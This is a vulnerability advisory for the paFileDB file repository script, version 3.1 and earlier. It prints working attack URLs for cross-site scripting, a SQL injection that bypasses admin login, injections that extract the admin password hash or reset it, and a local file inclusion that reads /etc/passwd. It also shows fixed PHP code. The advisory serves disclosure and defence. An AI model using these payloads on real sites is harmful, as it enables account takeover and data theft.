paFileDB Multiple Vulnerabilities
Vendor: php Arena
Product: paFileDB
Version: <= 3.1
Website: http://www.phparena.net/pafiledb.php
BID: 13967
CVE: CVE-2005-1999 CVE-2005-2000 CVE-2005-2001
OSVDB: 17473 17474 17475 17476
SECUNIA: 11489
PACKETSTORM: 38174
Description:
paFileDB is a popular open source web application offered by php Arena. paFileDB allows webmasters to open up an interactive file repository on their website. There are a number of vulnerabilities in paFileDB that may allow an attacker to include arbitrary files, retrieve sensitive user and/or database information, and completely bypass admin and team member authentication. Users should upgrade immediately.


Cross Site Scripting:
There are a number of cross site scripting issues in the paFileDB software. The majority of these cross site scripting issues stem from concatenated variables never being initialized, so their value can be supplied from the request.

http://pafiledb/pafiledb.php?action=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
script%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the context of the victim's browser, and in turn disclose sensitive information to an attacker.


SQL Injection:
There are a number of SQL Injection vulnerabilities in paFileDB, but it should be noted that to exploit most of these issues magic_quotes_gpc must be off. Also, magic_quotes_gpc off seems to be the default php.ini setting now, so I consider these issues fairly high risk. The most serious of the SQL Injection issues lies in the administrative login.
if ($login == "do")
{
	// $formname and $formpass arrive straight from the login form (register_globals);
	// $formname is interpolated into the SQL string with no escaping at all
	$admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$formname'", 1);
	$formpw = md5($formpass);
	// the stored hash is read from whatever row the query returned, so an injected
	// UNION SELECT controls the value the submitted password is compared against
	if ($formpw == $admin[admin_password])
	{
		$adminip = getenv ("REMOTE_ADDR");
		$ip = md5($adminip);
		$user = $formname;
		$pass = $formpw;

		if ($authmethod == "cookies")
		{
			$cookiedata = "$ip|$formname|$formpw";
			setcookie("pafiledbcookie", $cookiedata);
		}

		header("Location: admin.php");
	}
}

The variable $formname is taken directly from the submitted login form and executed in the query, so if magic_quotes_gpc is off an attacker can use UNION SELECT to bypass admin authentication!

http://pafiledb/pafiledb.php?action=admin&login=do&formname='%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',
%20admin_email,%20'1'%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do

The query above uses a UNION SELECT to return the admin username, id, email, etc., but supplies the password column as the MD5 hash of the $formpass value, so the comparison succeeds. This same issue applies to the team login, and also to the auth.php scripts in the /teams/ and /admin/ directories.
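A hardened replacement for the admin login query shown above, added here as an example (it is not paFileDB's own code): the username is bound as data through a mysqli prepared statement, the form fields are read explicitly instead of via register_globals, and the stored hash is compared in constant time. The `$mysqli` handle, the `$db['prefix']` setting and the `admin_password` column are assumed from the advisory.

```php
<?php
// Added example, not paFileDB code. Assumes a mysqli connection in $mysqli
// and the table prefix from the application config in $db['prefix'].

// Read the form fields explicitly instead of relying on register_globals.
$formname = isset($_POST['formname']) ? (string) $_POST['formname'] : '';
$formpass = isset($_POST['formpass']) ? (string) $_POST['formpass'] : '';

function admin_login(mysqli $mysqli, string $prefix, string $formname, string $formpass): bool
{
    // Prepared statement: the username is bound as a parameter, so a quote
    // or a UNION SELECT inside it can never change the query structure.
    // $prefix comes from the config file, not from the request.
    $stmt = $mysqli->prepare(
        "SELECT admin_password FROM {$prefix}_admin WHERE admin_username = ? LIMIT 1"
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $formname);
    $stmt->execute();
    $stmt->bind_result($stored_hash);
    $found = $stmt->fetch();
    $stmt->close();

    if (!$found) {
        return false; // unknown user: no row, so nothing to compare against
    }
    // paFileDB stores md5 hashes; compare in constant time rather than with ==.
    // A modern rewrite would use password_hash()/password_verify() instead.
    return hash_equals((string) $stored_hash, md5($formpass));
}

if (isset($_POST['login']) && $_POST['login'] === 'do') {
    if (admin_login($mysqli, $db['prefix'], $formname, $formpass)) {
        header('Location: admin.php');
        exit;
    }
    http_response_code(403);
    exit('Login failed');
}
```

With the username bound as a parameter the value `' UNION SELECT ...` is looked up literally as a username and simply returns no row.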

There is also an SQL Injection vulnerability that allows team members to obtain the administrative password hash and escalate their privileges to admin.

http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

Last but not least there is a SQL Injection vulnerability in search.php because the $string variable is never sanitized.

There is one SQL Injection issue in paFileDB that does not require magic_quotes_gpc to be disabled. This particular issue will let a team member run any SQL command that they like, including making themselves an admin.

http://pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*

The above URL would set the admin password to 1337 if run by a logged-in team member or admin. This vulnerability exists because the $query variable is never declared before being concatenated, so we can in turn hijack the $query variable from the request and run any SQL commands we like.


Local File Inclusion:
paFileDB is vulnerable to a local file inclusion vulnerability that may allow an attacker to execute arbitrary local scripts, or read/access arbitrary files on the webserver. Let's look at pafiledb.php:

// $action comes straight from the request and is used unchecked to build the include path
if ($login == "do") { include "./includes/$action/login.php"; exit; }
if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }
if ($tm == "logout") { include "./includes/team/logout.php"; exit; }


The $action variable is never sanitized and is vulnerable to directory traversal sequences.

http://pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do

This vulnerability exists on all paFileDB configurations, as all GPC (GET, POST and cookie) input is extracted into global variables.
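The register_globals behaviour just described is the common root of the uninitialised-variable cross site scripting issues, the $query hijack and this file inclusion. The following is an added example (not paFileDB's own code) of handling those inputs explicitly: request parameters are read from $_GET/$_POST through one helper, the login include is restricted to an allow-list of the action directories the advisory shows under ./includes/, and values echoed back into the page are escaped. The `param()` and `login_include_path()` names are assumptions.

```php
<?php
// Added example, not paFileDB code. Assumes ./includes/admin/ and
// ./includes/team/ are the only login action directories, as in pafiledb.php.

// Fetch one request parameter explicitly, with a default. A variable the
// script never set (such as $query or $filelist) can then no longer be
// supplied from the URL, which removes the register_globals root cause.
function param(string $name, string $default = ''): string
{
    if (isset($_POST[$name])) {
        return (string) $_POST[$name];
    }
    if (isset($_GET[$name])) {
        return (string) $_GET[$name];
    }
    return $default;
}

const LOGIN_ACTIONS = ['admin', 'team'];

// Map the request onto a fixed path instead of interpolating $action into
// it; traversal sequences and null bytes never reach include().
function login_include_path(string $action): ?string
{
    if (!in_array($action, LOGIN_ACTIONS, true)) {
        return null;
    }
    return __DIR__ . '/includes/' . $action . '/login.php';
}

$action = param('action');
if (param('login') === 'do') {
    $path = login_include_path($action);
    if ($path === null) {
        http_response_code(400);
        exit('Unknown action');
    }
    include $path;
    exit;
}

// Values reflected into the page (sortby, filelist, pages, ...) are always
// initialised here and HTML-escaped on output, closing the XSS vectors.
$sortby = htmlspecialchars(param('sortby', 'name'), ENT_QUOTES, 'UTF-8');
echo '<input type="hidden" name="sortby" value="' . $sortby . '">';
```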


Solution:
A new version of paFileDB has been released, so upgrading is advised.


Credits:
James Bercegay of the GulfTech Security Research Team